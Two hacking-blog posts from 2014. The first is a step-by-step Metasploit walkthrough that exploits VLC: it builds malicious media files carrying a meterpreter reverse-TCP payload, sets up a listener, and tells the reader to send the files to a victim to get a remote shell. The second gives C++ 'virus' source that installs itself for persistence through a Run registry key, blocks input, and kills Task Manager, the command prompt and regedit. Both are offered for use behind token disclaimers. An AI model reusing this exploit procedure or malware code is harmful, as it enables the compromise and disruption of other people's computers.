Tuesday, 5 August 2014

Hacking XP USING VLC PAYLOAD

Hacking XP  USING VLC PAYLOAD

NOTE : 
This TUTORIAL is only for educational purpose. We are not responsible for any illegal activities

Requirement:

Windows XP 

Attacker :   Backtrack 5/KALI LINUX
Victim PC :
 Windows XP


Description :
This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it. As such, this module is capable of bypassing DEP, but not ASLR.

Commands :
use exploit/windows/fileformat/vlc_modplug_s3m
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.1.1.20
exploit


  • Open terminal type msfconsole














>>Now type use exploit/windows/fileformat/vlc_realtext

>>Msf exploit (vlc_realtext)>set payload windows/meterpreter/reverse_tcp

>>Msf exploit (vlc_realtext) > set lhost 192.168.1.2 (IP of Local Host)




>>Msf exploit (vlc_realtext) > exploit

>>After we successfully generate the malicious MP4 File, it will stored on your local computer

>>/root/.msf4/local/msf.mp4

>>/root/.msf4/local/msf.rt





>>Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

>>use exploit/multi/handler

>>set payload windows/meterpreter/reverse_tcp

>>set lhost 192.168.1.2

>>exploit

>>Now send your msf.mp4 and msf.rt both files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer ]:-)


ENJOY HACKING!!!!!!



Sunday, 3 August 2014

Virus Code In C++


After Many Requests on providing some basic codes on virus in C++. Here I'm today with an another Post This time Specially For Our Visitors. Please the Code Down Is not to be used For any Wrong Purpose You are Yourself Responsible for, and Consequence That May Follow by the unauthorized use.

Virus Making Is A crime and i don't Take Any Clam over the Code it is not written By ME.



#include
#include
#include
#include
#include
#include
using namespace std;

int random, Freq, Dur, X, Y;
HWND mywindow, TaskMgr, CMD, Regedit;
char Notepad[MAX_PATH]="notepad.exe";
char MineSweeper[MAX_PATH]="winmine.exe";
char Hearts[MAX_PATH]="mshearts.exe";
char Website[MAX_PATH]="http:\\www.google.com";

void SetUp();
void Run( int ID );
void Beeper(), OpenStuff(), Hibernation(), CrazyMouse();

DWORD WINAPI DestroyWindows(LPVOID);

int main()
{
srand( time(0) );
random = rand()%6;
system("title :.Virus.:");
BlockInput( true );
SetUp();
BlockInput( false );
CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
while(1)
{
Run( random );
Sleep(10);
}
}
void SetUp()
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\winminer.exe");
CopyFile(pathtofile,system,false);

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Mcft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);

mywindow = FindWindow(NULL,":.Virus.:");
cout<<"You Are Doomed cyberot";
Sleep(1000);
ShowWindow(mywindow, false);
}

void Run( int ID )
{
if( ID == 1 )
{
BlockInput(true);
}
else if( ID == 2 )
{
Beeper();
}
else if( ID == 3 )
{
OpenStuff();
}
else if( ID == 4 )
{
Hibernation();
}
else if( ID == 5 )
{
CrazyMouse();
}
else
{
BlockInput(true);
Beeper();
OpenStuff();
CrazyMouse();
}
}

void Beeper()
{
Freq = rand()%2001;
Dur = rand()%301;
Beep( Freq, Dur );
}
void OpenStuff()
{
ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXIMIZE);
}
void Hibernation()
{
Sleep(1000);
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
}
void CrazyMouse()
{
X = rand()%801;
Y = rand()%601;
SetCursorPos( X, Y );
}

DWORD WINAPI DestroyWindows(LPVOID)
{
while(1)
{
TaskMgr = FindWindow(NULL,"Windows Task Manager");
CMD = FindWindow(NULL, "Command Prompt");
Regedit = FindWindow(NULL,"Registry Editor");
if( TaskMgr != NULL )
{
SetWindowText( TaskMgr, "You Suck Balls Superman");
PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( CMD != NULL )
{
SetWindowText( CMD, "You Suck Balls Superman");
PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( Regedit != NULL )
{
SetWindowText( Regedit, "You Suck Balls Superman");
PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}

Sleep(10);
}
}
This is Not A proper Virus But it is An Annoying One. Still I'll Explain the Working
the blank include lines are
#include <iostream> #include <stdio.h> #include <windows.h> #include <winable.h> #include <conio.h> #include <ctime>Turn off the monitor
void Hibernation() { Sleep(1000); SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2); }
making your mouse go crazy. Make two rand var's and tell the mouse to goto them
void CrazyMouse() { X = rand()%801; Y = rand()%601; SetCursorPos( X, Y ); }
open random Apps as it says OpenStuff
void OpenStuff() { ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXI MIZE); ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_ MAXIMIZE); ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIM IZE); ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXI MIZE); }
Find windows by name and destroy them ... Using the FindWindow command lets use do it and if its not null and it found the window open give it a command.
DWORD WINAPI DestroyWindows(LPVOID) { while(1) { TaskMgr = FindWindow(NULL,"Windows Task Manager"); CMD = FindWindow(NULL, "Command Prompt"); Regedit = FindWindow(NULL,"Registry Editor"); if( TaskMgr != NULL ) { SetWindowText( TaskMgr, "You Suck Balls Superman"); PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0); } if( CMD != NULL ) { SetWindowText( CMD, "You Suck Balls Superman"); PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0); } if( Regedit != NULL ) { SetWindowText( Regedit, "You Suck Balls Superman"); PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0); }
Add your program to run when windows starts
HKEY hKey; RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Mcft\\W indows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey ); RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system)); RegCloseKey(hKey);
Make your comp beep different freq and different lengths again by rand numbers
void Beeper() { Freq = rand()%2001; Dur = rand()%301; Beep( Freq, Dur ); }